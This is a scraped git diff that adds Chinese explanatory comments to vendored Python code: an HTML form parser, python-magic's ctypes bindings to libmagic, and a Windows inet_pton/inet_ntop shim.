if taken: if taken:
self.labels.append(d) self.labels.append(d)
# 将当前标签设置为d
self._current_label = d self._current_label = d
def end_label(self): def end_label(self):
# 打印空字符串
debug("") debug("")
# 获取当前标签
label = self._current_label label = self._current_label
# 如果当前标签不存在,则返回
if label is None: if label is None:
# something is ugly in the HTML, but we're ignoring it # something is ugly in the HTML, but we're ignoring it
return return
# 将当前标签设置为None
self._current_label = None self._current_label = None
# 如果当前标签存在则删除__taken属性
# if it is staying around, it is True in all cases # if it is staying around, it is True in all cases
del label["__taken"] del label["__taken"]
def _add_label(self, d): def _add_label(self, d):
#debug("%s", d) #debug("%s", d)
# 如果当前标签存在且__taken属性为False则将__taken属性设置为True并将当前标签添加到d的__label属性中
if self._current_label is not None: if self._current_label is not None:
if not self._current_label["__taken"]: if not self._current_label["__taken"]:
self._current_label["__taken"] = True self._current_label["__taken"] = True
@ -743,12 +792,16 @@ class _AbstractFormParser:
controls.append((type, name, d)) controls.append((type, name, d))
def do_isindex(self, attrs): def do_isindex(self, attrs):
# 打印传入的属性
debug("%s", attrs) debug("%s", attrs)
d = {} d = {}
# 遍历属性,将属性名和属性值存入字典
for key, val in attrs: for key, val in attrs:
d[key] = self.unescape_attr_if_required(val) d[key] = self.unescape_attr_if_required(val)
# 获取当前表单的控件
controls = self._current_form[2] controls = self._current_form[2]
# 添加标签
self._add_label(d) self._add_label(d)
# isindex doesn't have type or name HTML attributes # isindex doesn't have type or name HTML attributes
controls.append(("isindex", None, d)) controls.append(("isindex", None, d))

@ -64,14 +64,16 @@ class Magic:
return magic_file(self.cookie, filename) return magic_file(self.cookie, filename)
def __del__(self): def __del__(self):
# during shutdown magic_close may have been cleared already # 析构函数,确保在对象被垃圾回收时关闭 libmagic cookie
if self.cookie and magic_close: if self.cookie and magic_close:
magic_close(self.cookie) magic_close(self.cookie)
self.cookie = None self.cookie = None
# 全局变量用于保存默认和MIME magic对象
_magic_mime = None _magic_mime = None
_magic = None _magic = None
# 获取默认和MIME magic对象的函数
def _get_magic_mime(): def _get_magic_mime():
global _magic_mime global _magic_mime
if not _magic_mime: if not _magic_mime:
@ -90,6 +92,7 @@ def _get_magic_type(mime):
else: else:
return _get_magic() return _get_magic()
# 公共函数,用于识别文件和缓冲区
def from_file(filename, mime=False): def from_file(filename, mime=False):
m = _get_magic_type(mime) m = _get_magic_type(mime)
return m.from_file(filename) return m.from_file(filename)
@ -98,6 +101,7 @@ def from_buffer(buffer, mime=False):
m = _get_magic_type(mime) m = _get_magic_type(mime)
return m.from_buffer(buffer) return m.from_buffer(buffer)
# 使用 ctypes 导入 libmagic 库
try: try:
libmagic = None libmagic = None
@ -106,7 +110,7 @@ try:
from ctypes import c_char_p, c_int, c_size_t, c_void_p from ctypes import c_char_p, c_int, c_size_t, c_void_p
# Let's try to find magic or magic1 # 尝试找到 libmagic 库
dll = ctypes.util.find_library('magic') or ctypes.util.find_library('magic1') dll = ctypes.util.find_library('magic') or ctypes.util.find_library('magic1')
# This is necessary because find_library returns None if it doesn't find the library # This is necessary because find_library returns None if it doesn't find the library
@ -116,6 +120,7 @@ try:
except WindowsError: except WindowsError:
pass pass
# 如果没有找到,尝试平台特定的路径
if not libmagic or not libmagic._name: if not libmagic or not libmagic._name:
platform_to_lib = {'darwin': ['/opt/local/lib/libmagic.dylib', platform_to_lib = {'darwin': ['/opt/local/lib/libmagic.dylib',
'/usr/local/lib/libmagic.dylib', '/usr/local/lib/libmagic.dylib',
@ -127,10 +132,12 @@ try:
except OSError: except OSError:
pass pass
# 如果仍然没有找到,抛出 ImportError
if not libmagic or not libmagic._name: if not libmagic or not libmagic._name:
# It is better to raise an ImportError since we are importing magic module # It is better to raise an ImportError since we are importing magic module
raise ImportError('failed to find libmagic. Check your installation') raise ImportError('failed to find libmagic. Check your installation')
# 定义 magic_t 类型和错误检查函数
magic_t = ctypes.c_void_p magic_t = ctypes.c_void_p
def errorcheck(result, func, args): def errorcheck(result, func, args):
@ -145,6 +152,7 @@ try:
return None return None
return filename.encode(sys.getfilesystemencoding()) return filename.encode(sys.getfilesystemencoding())
# 使用 ctypes 定义 libmagic 函数
magic_open = libmagic.magic_open magic_open = libmagic.magic_open
magic_open.restype = magic_t magic_open.restype = magic_t
magic_open.argtypes = [c_int] magic_open.argtypes = [c_int]
@ -198,28 +206,31 @@ try:
magic_compile.restype = c_int magic_compile.restype = c_int
magic_compile.argtypes = [magic_t, c_char_p] magic_compile.argtypes = [magic_t, c_char_p]
# 如果 libmagic 无法导入,定义回退函数
except (ImportError, OSError): except (ImportError, OSError):
from_file = from_buffer = lambda *args, **kwargs: MAGIC_UNKNOWN_FILETYPE from_file = from_buffer = lambda *args, **kwargs: MAGIC_UNKNOWN_FILETYPE
MAGIC_NONE = 0x000000 # No flags
MAGIC_DEBUG = 0x000001 # Turn on debugging # 定义 libmagic 标志常量
MAGIC_SYMLINK = 0x000002 # Follow symlinks MAGIC_NONE = 0x000000 # 无标志
MAGIC_COMPRESS = 0x000004 # Check inside compressed files MAGIC_DEBUG = 0x000001 # 打开调试
MAGIC_DEVICES = 0x000008 # Look at the contents of devices MAGIC_SYMLINK = 0x000002 # 跟随符号链接
MAGIC_MIME = 0x000010 # Return a mime string MAGIC_COMPRESS = 0x000004 # 检查压缩文件内部
MAGIC_MIME_ENCODING = 0x000400 # Return the MIME encoding MAGIC_DEVICES = 0x000008 # 查看设备内容
MAGIC_CONTINUE = 0x000020 # Return all matches MAGIC_MIME = 0x000010 # 返回 MIME 字符串
MAGIC_CHECK = 0x000040 # Print warnings to stderr MAGIC_MIME_ENCODING = 0x000400 # 返回 MIME 编码
MAGIC_PRESERVE_ATIME = 0x000080 # Restore access time on exit MAGIC_CONTINUE = 0x000020 # 返回所有匹配项
MAGIC_RAW = 0x000100 # Don't translate unprintable chars MAGIC_CHECK = 0x000040 # 打印警告到标准错误
MAGIC_ERROR = 0x000200 # Handle ENOENT etc as real errors MAGIC_PRESERVE_ATIME = 0x000080 # 退出时恢复访问时间
MAGIC_NO_CHECK_COMPRESS = 0x001000 # Don't check for compressed files MAGIC_RAW = 0x000100 # 不转换不可打印字符
MAGIC_NO_CHECK_TAR = 0x002000 # Don't check for tar files MAGIC_ERROR = 0x000200 # 将 ENOENT 等视为真实错误
MAGIC_NO_CHECK_SOFT = 0x004000 # Don't check magic entries MAGIC_NO_CHECK_COMPRESS = 0x001000 # 不检查压缩文件
MAGIC_NO_CHECK_APPTYPE = 0x008000 # Don't check application type MAGIC_NO_CHECK_TAR = 0x002000 # 不检查 tar 文件
MAGIC_NO_CHECK_ELF = 0x010000 # Don't check for elf details MAGIC_NO_CHECK_SOFT = 0x004000 # 不检查 magic 条目
MAGIC_NO_CHECK_ASCII = 0x020000 # Don't check for ascii files MAGIC_NO_CHECK_APPTYPE = 0x008000 # 不检查应用程序类型
MAGIC_NO_CHECK_TROFF = 0x040000 # Don't check ascii/troff MAGIC_NO_CHECK_ELF = 0x010000 # 不检查 elf 详细信息
MAGIC_NO_CHECK_FORTRAN = 0x080000 # Don't check ascii/fortran MAGIC_NO_CHECK_ASCII = 0x020000 # 不检查 ascii 文件
MAGIC_NO_CHECK_TOKENS = 0x100000 # Don't check ascii/tokens MAGIC_NO_CHECK_TROFF = 0x040000 # 不检查 ascii/troff
MAGIC_NO_CHECK_FORTRAN = 0x080000 # 不检查 ascii/fortran
MAGIC_NO_CHECK_TOKENS = 0x100000 # 不检查 ascii/tokens
MAGIC_UNKNOWN_FILETYPE = b"unknown" MAGIC_UNKNOWN_FILETYPE = b"unknown"

@ -8,14 +8,15 @@ import socket
import ctypes import ctypes
import os import os
# 定义一个结构体用于存储socket地址信息
class sockaddr(ctypes.Structure): class sockaddr(ctypes.Structure):
_fields_ = [("sa_family", ctypes.c_short), _fields_ = [("sa_family", ctypes.c_short), # 地址族例如AF_INET或AF_INET6
("__pad1", ctypes.c_ushort), ("__pad1", ctypes.c_ushort), # 填充字段
("ipv4_addr", ctypes.c_byte * 4), ("ipv4_addr", ctypes.c_byte * 4), # IPv4地址4个字节
("ipv6_addr", ctypes.c_byte * 16), ("ipv6_addr", ctypes.c_byte * 16),# IPv6地址16个字节
("__pad2", ctypes.c_ulong)] ("__pad2", ctypes.c_ulong)] # 填充字段
# 根据操作系统的不同,导入不同的库
if hasattr(ctypes, 'windll'): if hasattr(ctypes, 'windll'):
WSAStringToAddressA = ctypes.windll.ws2_32.WSAStringToAddressA WSAStringToAddressA = ctypes.windll.ws2_32.WSAStringToAddressA
WSAAddressToStringA = ctypes.windll.ws2_32.WSAAddressToStringA WSAAddressToStringA = ctypes.windll.ws2_32.WSAAddressToStringA
@ -27,12 +28,13 @@ else:
WSAStringToAddressA = not_windows WSAStringToAddressA = not_windows
WSAAddressToStringA = not_windows WSAAddressToStringA = not_windows
# inet_pton函数将IP字符串转换为二进制格式
def inet_pton(address_family, ip_string): def inet_pton(address_family, ip_string):
addr = sockaddr() addr = sockaddr() # 创建sockaddr实例
addr.sa_family = address_family addr.sa_family = address_family # 设置地址族
addr_size = ctypes.c_int(ctypes.sizeof(addr)) addr_size = ctypes.c_int(ctypes.sizeof(addr)) # 获取地址结构体大小
# 使用WSAStringToAddressA函数将IP字符串转换为地址结构体
if WSAStringToAddressA( if WSAStringToAddressA(
ip_string, ip_string,
address_family, address_family,
@ -42,6 +44,7 @@ def inet_pton(address_family, ip_string):
) != 0: ) != 0:
raise socket.error(ctypes.FormatError()) raise socket.error(ctypes.FormatError())
# 根据地址族返回对应的二进制IP地址
if address_family == socket.AF_INET: if address_family == socket.AF_INET:
return ctypes.string_at(addr.ipv4_addr, 4) return ctypes.string_at(addr.ipv4_addr, 4)
if address_family == socket.AF_INET6: if address_family == socket.AF_INET6:
@ -49,14 +52,15 @@ def inet_pton(address_family, ip_string):
raise socket.error('unknown address family') raise socket.error('unknown address family')
# inet_ntop函数将二进制格式的IP地址转换为字符串
def inet_ntop(address_family, packed_ip): def inet_ntop(address_family, packed_ip):
addr = sockaddr() addr = sockaddr() # 创建sockaddr实例
addr.sa_family = address_family addr.sa_family = address_family # 设置地址族
addr_size = ctypes.c_int(ctypes.sizeof(addr)) addr_size = ctypes.c_int(ctypes.sizeof(addr)) # 获取地址结构体大小
ip_string = ctypes.create_string_buffer(128) ip_string = ctypes.create_string_buffer(128) # 创建字符串缓冲区
ip_string_size = ctypes.c_int(ctypes.sizeof(ip_string)) ip_string_size = ctypes.c_int(ctypes.sizeof(ip_string)) # 获取字符串缓冲区大小
# 根据地址族将二进制IP地址复制到地址结构体中
if address_family == socket.AF_INET: if address_family == socket.AF_INET:
if len(packed_ip) != ctypes.sizeof(addr.ipv4_addr): if len(packed_ip) != ctypes.sizeof(addr.ipv4_addr):
raise socket.error('packed IP wrong length for inet_ntoa') raise socket.error('packed IP wrong length for inet_ntoa')
@ -68,6 +72,7 @@ def inet_ntop(address_family, packed_ip):
else: else:
raise socket.error('unknown address family') raise socket.error('unknown address family')
# 使用WSAAddressToStringA函数将地址结构体转换为IP字符串
if WSAAddressToStringA( if WSAAddressToStringA(
ctypes.byref(addr), ctypes.byref(addr),
addr_size, addr_size,
@ -79,7 +84,7 @@ def inet_ntop(address_family, packed_ip):
return ip_string[:ip_string_size.value - 1] return ip_string[:ip_string_size.value - 1]
# Adding our two functions to the socket library # 如果当前操作系统是Windows将自定义的inet_pton和inet_ntop函数添加到socket库中
if os.name == 'nt': if os.name == 'nt':
socket.inet_pton = inet_pton socket.inet_pton = inet_pton
socket.inet_ntop = inet_ntop socket.inet_ntop = inet_ntop
Loading…
Cancel
Save